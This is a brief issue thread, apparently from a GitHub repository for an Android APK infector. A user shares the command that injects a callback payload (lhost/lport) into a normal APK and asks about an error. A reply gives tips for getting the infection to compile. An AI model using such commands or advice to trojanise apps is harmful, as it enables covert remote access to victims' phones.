Closed CalfCrusher closed 4 years ago
This error is because of APKTool
, use any other APK with size less than or equals to 20 mb
Also try to infect little bit older version of apk, as APKTool might not be able to compile that latest apk because of difference in SDK version.
Make sure to update apktool to the latest version (Very important)
Hello,
i get this error when try to generate
python3 infector.py --lhost 192.168.56.10 --lport 4444 --apk-name infected.apk --normal-apk /home/kali/Downloads/normal.apk
i'm using
Linux kali 5.4.0-kali4-amd64 #1 SMP Debian 5.4.19-1kali1 (2020-02-17) x86_64 GNU/Linux
i previously installed all dependencies:
apktool zipalign apksigner
Anyone has this error ?